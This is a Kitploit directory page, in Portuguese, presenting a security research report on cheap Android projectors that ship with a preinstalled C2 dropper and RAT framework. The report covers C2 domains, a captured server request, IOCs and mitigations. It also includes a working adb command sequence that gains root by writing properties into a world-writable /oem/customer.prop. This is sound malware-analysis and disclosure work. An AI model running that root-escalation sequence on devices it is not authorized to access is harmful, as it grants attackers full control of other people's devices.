Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Android-Projector-C2-Malware — Análise de uma rede c2 de beamers chineses - SilentSDK-Analysis | Kitploit
Ferramentas/GitHubGitHub/kavan00/android-projector-c2-malware
Segurança AndroidSegurança de Sistemas EmbarcadosGerenciamento de Indicadores de Comprometimento (IOC)Segurança IoTForensia de RedeEngenharia ReversaAnálise de MalwareForensia DigitalComando e Controle

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Inteligência de Ameaças
Segurança da Cadeia de Suprimentos
Análise de Firmware
GitHubkavan00/android-projector-c2-malware

Android-Projector-C2-Malware

Análise de uma rede c2 de beamers chineses - SilentSDK-Analysis

Ver Repositório
18266há 5 mesesAinda não revisado
Compartilhar

Infraestrutura C2 Pré-instalada e Payload RAT em Projetores Android

Relatório de Análise Técnica — Pesquisa de Segurança


Dispositivos Afetados: Múltiplos projetores Android de marcas como Nonete (ex.: Modelo HY260Pro) (provavelmente também vários projetores da Magcubic, Hotack, Huyukang e muitos outros, pois essas empresas distribuem modelos semelhantes e há indícios que apoiam isso)
Plataforma do Chipset: Allwinner H713 / sun50iw12p1 — potencialmente afeta todos os dispositivos nesta plataforma
Período de Análise: 11 a 17 de abril de 2026
Classificação: Infraestrutura de Comando e Controle pré-instalada com payload de Trojan de Acesso Remoto


TL;DR

  • O Problema: Numerosos projetores Android baratos (potencialmente marcas como Magcubic, Hotack, etc., utilizando o chip Allwinner H713), atualmente vendidos em grandes quantidades na Amazon, eBay e AliExpress, estão infectados com malware diretamente da fábrica (Ataque à Cadeia de Suprimentos, semelhante aos casos "BADBOX").
  • O Mecanismo: Um aplicativo de sistema aparentemente inofensivo ("StoreOS") atua como um dropper disfarçado. Ele baixa silenciosamente um Dropper de Estágio 2 chamado "SilentSDK" em segundo plano e o instala com privilégios máximos do sistema, que por sua vez instala uma estrutura modular, baseada em plugins, ciente da arquitetura, de RAT e possivelmente phishing.
  • O Perigo: O malware estabelece uma conexão C2 com a China (api.pixelpioneerss.com), extrai IDs sensíveis do dispositivo e pode baixar e executar código malicioso adicional arbitrário com privilégios de root a qualquer momento (chmod 777). Além disso, os dispositivos possuem backdoors de root abertos.
  • Mitigação Imediata: Os domínios C2 (especialmente *.aodintech.com, api.pixelpioneerss.com, sta.smartinnovate.net) devem ser bloqueados no nível de rede. Os usuários afetados só podem desabilitar os aplicativos maliciosos manualmente via ADB, pois estão profundamente embutidos no sistema.

Aviso de Urgência

A infraestrutura de malware documentada neste relatório está pré-instalada em projetores Android atualmente sendo vendidos em grandes quantidades para consumidores finais na Amazon, eBay e AliExpress. Os dispositivos afetados abrangem possivelmente múltiplas marcas (Hotack, Huyukang, Magcubic, Nonete, entre outras). Infraestrutura C2 idêntica foi confirmada independentemente em outros dispositivos do mesmo fabricante (veja Seção 13). O padrão corresponde aos casos BADBOX.


Índice

  1. Identificação do Dispositivo
  2. Fluxo de Trabalho da Investigação
  3. Acesso Root — Caminho de Exploração
  4. Resposta do Servidor C2 — Evidência Principal
  5. Visão Geral do Ecossistema de Malware
  6. StoreOS — Análise do Dropper (com.htc.storeos)
  7. EventUploadService — Telemetria (com.htc.eventuploadservice)
  8. ExpandSDK — Injeção de Anúncios (com.htc.expandsdk)
  9. SilentSDK — Análise do Dropper de Estágio 2 (com.hotack.silentsdk)
  10. O Malware
  11. Backdoors do Sistema
  12. Perícia de Rede
  13. Spoofing de Dispositivo (Spoofing de Build Fingerprint)
  14. Confirmação Externa
  15. Indicadores de Comprometimento (IOCs)
  16. Mapeamento MITRE ATT&CK
  17. Mitigações Imediatas
  18. Fontes

Dispositivo Adquirido: Amazon Link - Nonete Mini Beamer 4K 1080P


1. Identificação do Dispositivo

PropriedadeValor
Nome da MarcaNonete HY260Pro (modelo vendido por várias empresas)
Nome do Modelo InternoNT10
SoCAllwinner sun50iw12p1 (ARM 32 bits)
Sistema OperacionalSpectraOS (Android 11, Kernel 5.4.99)
Real Build FingerprintAllwinner/h713_tuna_p3/h713-tuna_p3:11
Spoofed Build FingerprintADT-3/adt3/adt3:11/RP1A.201005.006
SELinuxPermissivo (sem aplicação)
Chave de Assinatura da PlataformaChave de Teste AOSP Pública
Certificado OEMCN=蓝鲨, OU=www.bsh.me, C=CN
Canal de FirmwareHY260Pro_SpectraOS_TPYB

Nota sobre o escopo: O chipset Allwinner H713 está integrado em numerosos projetores Android baratos vendidos sob nomes de marcas variáveis no mercado europeu. A base de firmware idêntica (h713_tuna_p3) e o operador C2 idêntico (Shenzhen Aodin Technology) sugerem fortemente que todos os dispositivos deste OEM contêm a mesma infraestrutura.


2. Fluxo de Trabalho da Investigação

EtapaAçãoResultado
1Captura de tráfego de rede com WiresharkTráfego HTTP para store-api.aodintech.com
2Decodificação da resposta C2 compactada com gzip7 apps, incluindo "SilentTools" oculto
3Descriptografia AES-CBC do caminho de downloadChave [REDACTED], URL para arquivo .bpp
4Exploração de root via /oem/customer.propuid=0(root) após injeção de propriedade
5Extração forense de /data, /oem, /systemAPKs, bancos de dados, configurações
6Análise estática do DEX do StoreOSpm install -r -d, proteção de inversão de bytes
7Engenharia reversa do mecanismo reverseLenCompreensão da proteção antianálise
8Quebra da proteção de inversão de bytesDEX do SilentSDK descriptografado e analisável
9Descriptografia XOR das strings do SilentSDKDomínio C2 api.pixelpioneerss.com confirmado
10Verificação de hash em três fontesMD5/SHA-256 correspondem perfeitamente
11Engenharia reversa do processo de download do malwareServidores ainda online
12Engenharia reversa do malwareFramework RAT baseado em plugins

3. Acesso Root — Caminho de Exploração

O acesso root foi alcançado através de uma combinação de três vulnerabilidades:

  1. SELinux Permissivo — Violações de acesso são apenas registradas, não bloqueadas.
  2. /oem gravável mundialmente — A partição é montada como FAT com fmask=0000.
  3. customer.prop carregado na inicialização — Sobrescreve propriedades do sistema.```bash adb shell getenforce # Result: Permissive adb shell ls -la /oem/ # All files world-writable

adb shell 'echo "ro.debuggable=1" >> /oem/customer.prop' adb shell 'echo "service.adb.root=1" >> /oem/customer.prop' adb shell 'echo "ro.secure=0" >> /oem/customer.prop'

adb reboot && adb wait-for-device && adb root adb shell id

uid=0(root) gid=0(root) context=u:r:su:s0

**Impacto:** Qualquer utilizador com acesso físico ou um atacante na mesma rede (via ADB, porta 5555 aberta, sem autenticação) obtém acesso root completo.

---

## 4. Resposta do Servidor C2 — Evidência Principal

### Requisição HTTP Capturada```http
POST /sign/app/list HTTP/1.1
chanId: HY260Pro_SpectraOS_TPYB
timestamp: 1775904428922
sign: [REDACTED]
Content-Type: application/json;charset=UTF-8
Content-Length: 184
Host: store-api.aodintech.com
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/5.0.0-alpha.12

Resposta do Servidor (Decodificado do pcapng - Tabela)

A resposta compactada com gzip contém uma lista JSON com sete aplicativos. Seis deles são aplicativos de streaming comuns (YouTube, Netflix, Disney+, Prime Video, Chrome, BrowseHere). O sétimo é SilentTools:

AppPackageisShowisForceisSilent InstallisSilent Uninstalllaunch Type
YouTubecom.google.android.youtube.tvtruefalsefalsefalse0
Disney+com.disney.disneyplustruefalsefalsefalse0
Netflixcom.netflix.mediaclienttruefalsefalsefalse0
Chromecom.android.chrometruefalsefalsefalse0
Prime Videocom.amazon.amazonvideo.livingroomtruefalsefalsefalse0
BrowseHerecom.tcl.browsertruefalsefalsefalse0
SilentToolscom.hotack.silentsdkfalsetruefalsetrue1
Baixar ferramenta